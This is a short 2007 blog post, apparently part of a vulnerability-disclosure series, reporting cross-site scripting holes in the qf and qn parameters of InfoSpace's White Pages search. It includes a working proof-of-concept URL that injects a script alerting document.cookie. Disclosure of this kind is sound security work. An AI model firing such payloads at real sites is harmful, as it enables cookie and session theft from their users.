MOSEB-26: Vulnerabilities at www.infospace.com

19:02 26.06.2007

Next participant of the project is InfoSpace search engine. It is one of the popular search engines (which mainly provide searching in Yellow Pages and White Pages, but also meta searching in Web and others).

The vulnerabilities are at InfoSpace (www.infospace.com) in White Pages search. These Cross-Site Scripting holes I found 27.05.2007.

XSS:

The vulnerabilities are in qf and qn parameters:
http://www.infospace.com/home/white-pages/message.htm?otmpl=/white-pages/results.htm&qf=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E&searchtype=citystate

Moral: searching in white pages can be dangerous.

P.S.

Also I prepared another hole at InfoSpace. So wait for today’s bonus post ;-) .


Leave a Reply

You must be logged in to post a comment.